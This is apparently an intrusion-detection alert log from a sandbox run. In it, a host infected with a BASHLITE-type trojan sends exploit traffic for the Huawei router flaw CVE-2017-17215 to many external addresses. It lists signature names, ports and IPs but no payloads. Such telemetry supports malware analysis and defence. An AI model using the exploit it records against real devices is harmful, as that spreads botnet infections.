                                            06/14/24-10:43:34.679444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4978837215192.168.2.14156.242.101.133
                                            06/14/24-10:43:52.907697TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)5843223192.168.2.1443.231.232.101
                                            06/14/24-10:44:20.828512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572237215192.168.2.14156.108.226.3
                                            06/14/24-10:44:00.320972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4276637215192.168.2.14156.159.116.141
                                            06/14/24-10:44:04.424417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3894037215192.168.2.1441.31.62.107
                                            06/14/24-10:44:16.734668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5960237215192.168.2.1441.59.157.194
                                            06/14/24-10:44:08.519308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5987637215192.168.2.14197.65.241.119
                                            06/14/24-10:44:33.133072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5887237215192.168.2.14197.169.42.4
                                            06/14/24-10:44:18.779871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155237215192.168.2.14156.135.197.219
                                            06/14/24-10:43:34.662755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4758237215192.168.2.1441.49.177.241
                                            06/14/24-10:44:35.181888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5863237215192.168.2.14156.255.115.255
                                            06/14/24-10:44:18.776719TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4074837215192.168.2.14197.233.100.250
                                            06/14/24-10:44:14.683805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256437215192.168.2.1441.241.160.44
                                            06/14/24-10:43:45.966358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4183037215192.168.2.14156.213.121.122
                                            06/14/24-10:44:08.505082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3605637215192.168.2.1441.141.20.226
                                            06/14/24-10:43:56.252882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4462037215192.168.2.1441.235.169.189
                                            06/14/24-10:44:35.182874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4616437215192.168.2.14156.222.125.154
                                            06/14/24-10:44:33.131575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3882037215192.168.2.14197.185.197.22
                                            06/14/24-10:43:43.941273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684837215192.168.2.1441.51.39.86
                                            06/14/24-10:43:39.813351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4387837215192.168.2.1441.193.116.162
                                            06/14/24-10:44:27.000724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5756837215192.168.2.14156.125.51.246
                                            06/14/24-10:43:48.028940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5482037215192.168.2.14156.183.166.31
                                            06/14/24-10:44:02.368623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605437215192.168.2.1441.177.87.39
                                            06/14/24-10:43:36.704286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3464437215192.168.2.14197.25.104.255
                                            06/14/24-10:44:14.689437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5053637215192.168.2.1441.30.208.24
                                            06/14/24-10:43:34.660692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4622437215192.168.2.14197.145.0.42
                                            06/14/24-10:43:37.761900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3318437215192.168.2.14156.92.241.165
                                            06/14/24-10:43:41.846551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4576637215192.168.2.14197.221.114.154
                                            06/14/24-10:43:52.147119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772037215192.168.2.14197.176.255.41
                                            06/14/24-10:43:37.763305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3942437215192.168.2.14197.193.31.30
                                            06/14/24-10:44:08.502884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115237215192.168.2.14156.93.50.53
                                            06/14/24-10:43:58.277106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4230437215192.168.2.14156.70.98.22
                                            06/14/24-10:44:04.421038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4658237215192.168.2.14197.14.76.182
                                            06/14/24-10:44:16.732188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926437215192.168.2.14197.202.150.156
                                            06/14/24-10:43:45.966452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4590237215192.168.2.1441.148.62.46
                                            06/14/24-10:44:12.618364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868837215192.168.2.1441.42.70.162
                                            06/14/24-10:44:29.012248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3400237215192.168.2.1441.193.160.102
                                            06/14/24-10:44:00.321618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396637215192.168.2.1441.232.120.248
                                            06/14/24-10:44:12.617538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5381037215192.168.2.14156.241.164.114
                                            06/14/24-10:44:29.014872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3509837215192.168.2.14197.136.162.178
                                            06/14/24-10:44:14.688376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4049037215192.168.2.1441.114.209.204
                                            06/14/24-10:43:48.019884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4850837215192.168.2.14156.178.105.198
                                            06/14/24-10:43:39.809931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5767637215192.168.2.14156.83.128.43
                                            06/14/24-10:43:45.965853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4557837215192.168.2.14156.70.153.146
                                            06/14/24-10:44:16.733510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843837215192.168.2.14197.83.174.117
                                            06/14/24-10:44:33.134787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379237215192.168.2.14197.116.173.66
                                            06/14/24-10:43:50.111666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4948837215192.168.2.14156.28.137.12
                                            06/14/24-10:44:33.152760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5394037215192.168.2.14197.5.231.18
                                            06/14/24-10:44:02.366992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586237215192.168.2.14156.211.92.239
                                            06/14/24-10:43:48.017508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990837215192.168.2.14156.33.142.225
                                            06/14/24-10:43:56.228965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4788237215192.168.2.1441.148.97.114
                                            06/14/24-10:44:02.383850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4541437215192.168.2.14197.209.93.226
                                            06/14/24-10:44:02.383991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4367837215192.168.2.14156.246.158.242
                                            06/14/24-10:43:48.019061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5160037215192.168.2.1441.187.166.95
                                            06/14/24-10:44:22.882943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3335437215192.168.2.1441.23.119.41
                                            06/14/24-10:44:29.024949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5387437215192.168.2.14156.43.58.139
                                            06/14/24-10:43:52.150490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5830837215192.168.2.14156.215.143.192
                                            06/14/24-10:44:08.504084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3608637215192.168.2.14197.50.195.57
                                            06/14/24-10:44:29.012340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4726437215192.168.2.14156.189.137.187
                                            06/14/24-10:43:48.029525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4030037215192.168.2.1441.28.71.181
                                            06/14/24-10:44:20.829107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079637215192.168.2.14197.85.102.183
                                            06/14/24-10:43:45.989703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079237215192.168.2.14197.203.195.179
                                            06/14/24-10:44:31.053426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4399837215192.168.2.14197.164.248.30
                                            06/14/24-10:43:39.807828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851037215192.168.2.14156.158.69.102
                                            06/14/24-10:44:10.580872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639837215192.168.2.14197.97.245.102
                                            06/14/24-10:44:10.549395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4274437215192.168.2.1441.41.172.152
                                            06/14/24-10:44:33.133581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5089237215192.168.2.14197.143.250.56
                                            06/14/24-10:43:34.678571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5116637215192.168.2.14197.50.232.201
                                            06/14/24-10:44:04.406275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4924637215192.168.2.1441.217.250.236
                                            06/14/24-10:43:43.942825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354637215192.168.2.14197.112.21.75
                                            06/14/24-10:44:06.452635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5623237215192.168.2.1441.129.207.237
                                            06/14/24-10:43:58.276974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3316437215192.168.2.14156.171.239.199
                                            06/14/24-10:44:00.323626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5795637215192.168.2.1441.233.45.125
                                            06/14/24-10:43:39.808955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3497237215192.168.2.14156.78.100.216
                                            06/14/24-10:43:36.704441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966237215192.168.2.14197.211.33.33
                                            06/14/24-10:43:48.032922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4953637215192.168.2.1441.64.210.95
                                            06/14/24-10:44:24.917401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986237215192.168.2.14197.113.77.208
                                            06/14/24-10:44:29.013347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3531437215192.168.2.14197.2.145.21
                                            06/14/24-10:44:00.321836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025437215192.168.2.14156.46.148.186
                                            06/14/24-10:44:16.732268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5668237215192.168.2.14156.224.136.199
                                            06/14/24-10:44:10.544835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5634237215192.168.2.1441.71.141.149
                                            06/14/24-10:43:41.897307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815237215192.168.2.1441.88.32.119
                                            06/14/24-10:44:14.671062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3481237215192.168.2.1441.217.107.140
                                            06/14/24-10:44:14.667118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3390837215192.168.2.1441.168.225.228
                                            06/14/24-10:44:26.977829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649837215192.168.2.14156.198.217.235
                                            06/14/24-10:44:31.054791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283037215192.168.2.14197.136.132.84
                                            06/14/24-10:44:22.862518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3522837215192.168.2.14156.202.231.103
                                            06/14/24-10:43:41.898219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5149237215192.168.2.14197.189.146.28
                                            06/14/24-10:43:58.295667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5459237215192.168.2.1441.49.255.136
                                            06/14/24-10:43:39.811844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4117637215192.168.2.14197.193.123.89
                                            06/14/24-10:44:08.517881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5466437215192.168.2.1441.71.237.123
                                            06/14/24-10:43:39.789880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4353037215192.168.2.14197.122.252.45
                                            06/14/24-10:44:16.715747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699637215192.168.2.1441.32.17.148
                                            06/14/24-10:44:02.367489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399637215192.168.2.1441.131.199.29
                                            06/14/24-10:44:24.917889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6097837215192.168.2.14197.135.72.38
                                            06/14/24-10:43:39.789297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3704037215192.168.2.14156.40.87.121
                                            06/14/24-10:44:26.977327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5374837215192.168.2.14156.96.25.65
                                            06/14/24-10:43:56.245613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482637215192.168.2.14197.137.42.110
                                            06/14/24-10:44:04.410734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407037215192.168.2.14156.213.190.236
                                            06/14/24-10:44:31.055594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624837215192.168.2.14156.153.183.52
                                            06/14/24-10:44:24.917585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3535437215192.168.2.14197.87.158.149
                                            06/14/24-10:43:34.663384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4468037215192.168.2.14156.60.18.213
                                            06/14/24-10:44:16.733009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5216837215192.168.2.14156.183.145.118
                                            06/14/24-10:43:37.761361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4441237215192.168.2.1441.145.151.129
                                            06/14/24-10:43:50.112320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081837215192.168.2.14156.44.96.139
                                            06/14/24-10:44:29.014173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3816637215192.168.2.1441.174.128.181
                                            06/14/24-10:44:02.385691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3814237215192.168.2.14156.112.19.190
                                            06/14/24-10:44:20.805448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688637215192.168.2.1441.241.96.172
                                            06/14/24-10:44:24.943765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5583037215192.168.2.14156.40.24.119
                                            06/14/24-10:43:34.662188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315037215192.168.2.1441.211.139.167
                                            06/14/24-10:43:48.021402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674037215192.168.2.14156.166.180.121
                                            06/14/24-10:43:48.019107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544437215192.168.2.1441.192.205.126
                                            06/14/24-10:43:50.072542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118437215192.168.2.1441.241.225.78
                                            06/14/24-10:44:06.450218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975237215192.168.2.14156.133.228.200
                                            06/14/24-10:44:22.879544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5217237215192.168.2.14156.208.134.43
                                            06/14/24-10:44:00.324296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114237215192.168.2.14197.140.149.20
                                            06/14/24-10:44:33.133878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4113837215192.168.2.14156.28.165.152
                                            06/14/24-10:44:08.503845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4864837215192.168.2.1441.11.90.92
                                            06/14/24-10:44:12.645056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054637215192.168.2.1441.148.231.116
                                            06/14/24-10:43:34.676922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958637215192.168.2.14156.107.88.231
                                            06/14/24-10:43:56.230697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804837215192.168.2.14197.87.111.220
                                            06/14/24-10:44:29.010099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5883237215192.168.2.1441.190.81.236
                                            06/14/24-10:43:48.021280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4790437215192.168.2.14197.150.238.249
                                            06/14/24-10:44:22.878779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4902037215192.168.2.14197.162.246.162
                                            06/14/24-10:43:37.762246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4301037215192.168.2.14197.64.3.231
                                            06/14/24-10:43:45.965465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5958037215192.168.2.14197.138.56.222
                                            06/14/24-10:44:04.424792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5858437215192.168.2.14197.42.83.35
                                            06/14/24-10:43:54.200154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355837215192.168.2.14156.236.18.48
                                            06/14/24-10:44:16.716242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6042237215192.168.2.14197.207.223.90
                                            06/14/24-10:44:26.986456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4893037215192.168.2.14197.29.103.107
                                            06/14/24-10:43:52.149565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4846637215192.168.2.1441.114.142.13
                                            06/14/24-10:43:58.275752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003637215192.168.2.1441.200.174.49
                                            06/14/24-10:44:04.421932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5502837215192.168.2.14197.102.205.160
                                            06/14/24-10:43:56.228610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5777037215192.168.2.14156.184.58.92
                                            06/14/24-10:44:00.340505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788637215192.168.2.14197.105.58.120
                                            06/14/24-10:43:54.184566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997637215192.168.2.1441.229.171.191
                                            06/14/24-10:43:43.943319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3774637215192.168.2.1441.92.99.154
                                            06/14/24-10:43:50.112201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5676437215192.168.2.1441.184.248.175
                                            06/14/24-10:44:02.367546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3973037215192.168.2.1441.5.148.164
                                            06/14/24-10:43:37.759803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5112837215192.168.2.14156.221.41.190
                                            06/14/24-10:43:54.201199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131637215192.168.2.14197.172.10.106
                                            06/14/24-10:44:29.011124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4327637215192.168.2.14197.134.163.12
                                            06/14/24-10:44:00.341089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5312037215192.168.2.14156.111.250.212
                                            06/14/24-10:43:39.792028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5528037215192.168.2.14197.107.144.207
                                            06/14/24-10:44:08.504896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410037215192.168.2.14156.56.221.70
                                            06/14/24-10:43:58.275662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5365037215192.168.2.14156.128.115.220
                                            06/14/24-10:44:16.735304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576237215192.168.2.14156.61.52.184
                                            06/14/24-10:43:43.969610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302037215192.168.2.1441.191.247.207
                                            06/14/24-10:43:58.276057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3357837215192.168.2.14197.33.128.23
                                            06/14/24-10:44:18.776498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4100237215192.168.2.14156.195.50.9
                                            06/14/24-10:44:31.053711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4773237215192.168.2.14197.153.132.149
                                            06/14/24-10:44:04.409303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5165437215192.168.2.14197.75.83.128
                                            06/14/24-10:44:10.567618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4557637215192.168.2.14197.74.245.44
                                            06/14/24-10:44:06.472947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031837215192.168.2.1441.17.236.159
                                            06/14/24-10:44:20.805185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5111637215192.168.2.1441.0.101.44
                                            06/14/24-10:43:58.295129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921637215192.168.2.1441.244.149.203
                                            06/14/24-10:44:29.025487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4849037215192.168.2.14197.30.23.158
                                            06/14/24-10:43:54.183539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3815237215192.168.2.14197.57.241.193
                                            06/14/24-10:44:00.343996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5269637215192.168.2.14156.124.68.13
                                            06/14/24-10:43:50.072786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5053437215192.168.2.14197.235.250.195
                                            06/14/24-10:43:56.230049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769237215192.168.2.14156.160.231.20
                                            06/14/24-10:43:37.762909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110237215192.168.2.14156.162.62.98
                                            06/14/24-10:43:56.228075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4214637215192.168.2.14156.244.170.185
                                            06/14/24-10:44:29.014196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4296437215192.168.2.14197.13.86.109
                                            06/14/24-10:44:14.681980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5529437215192.168.2.14197.197.207.186
                                            06/14/24-10:44:24.917062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3984437215192.168.2.14197.67.235.19
                                            06/14/24-10:44:08.505133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052637215192.168.2.1441.87.120.164
                                            06/14/24-10:44:18.761369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469237215192.168.2.14197.152.48.213
                                            06/14/24-10:44:22.861871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3394837215192.168.2.14197.160.154.221
                                            06/14/24-10:44:12.617616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3848437215192.168.2.14197.240.210.111
                                            06/14/24-10:43:39.808912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085637215192.168.2.14156.21.53.94
                                            06/14/24-10:44:35.179527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943637215192.168.2.14197.105.8.151
                                            06/14/24-10:43:34.677750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737637215192.168.2.14156.128.6.30
                                            06/14/24-10:44:04.407024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4234037215192.168.2.14156.255.200.254
                                            06/14/24-10:44:14.672808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4406037215192.168.2.14197.2.80.116
                                            06/14/24-10:44:22.862029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5841637215192.168.2.1441.118.233.74
                                            06/14/24-10:43:58.292455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4750637215192.168.2.14197.214.185.150
                                            06/14/24-10:44:00.326017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999037215192.168.2.1441.97.228.114
                                            06/14/24-10:44:10.543446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009437215192.168.2.1441.179.40.107
                                            06/14/24-10:43:52.161572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3567437215192.168.2.1441.93.177.177
                                            06/14/24-10:44:08.501737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3697237215192.168.2.1441.206.118.42
                                            06/14/24-10:44:16.715540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4677637215192.168.2.1441.163.39.213
                                            06/14/24-10:43:39.791664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705437215192.168.2.14156.3.195.204
                                            06/14/24-10:44:04.410351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3495437215192.168.2.14197.114.167.85
                                            06/14/24-10:44:35.179619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4036637215192.168.2.14197.102.250.22
                                            06/14/24-10:43:36.717993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3803237215192.168.2.14156.215.194.77
                                            06/14/24-10:44:31.057118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5307837215192.168.2.14156.207.52.77
